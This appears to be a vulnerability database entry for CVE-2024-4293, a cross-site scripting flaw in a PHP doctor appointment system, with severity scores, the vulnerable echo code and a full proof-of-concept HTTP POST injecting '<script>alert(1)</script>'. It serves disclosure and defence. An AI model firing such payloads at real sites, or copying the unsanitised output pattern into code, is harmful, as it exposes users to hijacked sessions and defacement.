3.5 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
7.2 High
AI Score
Confidence
Low
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:S/C:N/I:P/A:N
0.0004 Low
EPSS
Percentile
14.2%
`# Application Name: Doctor Appointment Management System
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)
# BuG: XsS
# BUG_Author: SoSPiro
# Version: 1.0
# CVE: CVE-2024-4293
### Vulnerable code section:
- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`
- **`Lines 57-61`**
- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`
```php
<?php
$fdate=$_POST['fromdate'];
$tdate=$_POST['todate'];
?>
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>
```
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.
### Vulnerability Description:
- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.
### Proof of Concept (PoC)
- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)
- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)
```http
POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: close
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: blue
fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=
```
- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:
`<script>alert(1)</script>`
- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.
### Impact:
- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.
### Reproduce:
- [ -vuldb.com- ](https://vuldb.com/?id.262225)
- [ -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)
- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)
- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)
`
3.5 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
7.2 High
AI Score
Confidence
Low
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:S/C:N/I:P/A:N
0.0004 Low
EPSS
Percentile
14.2%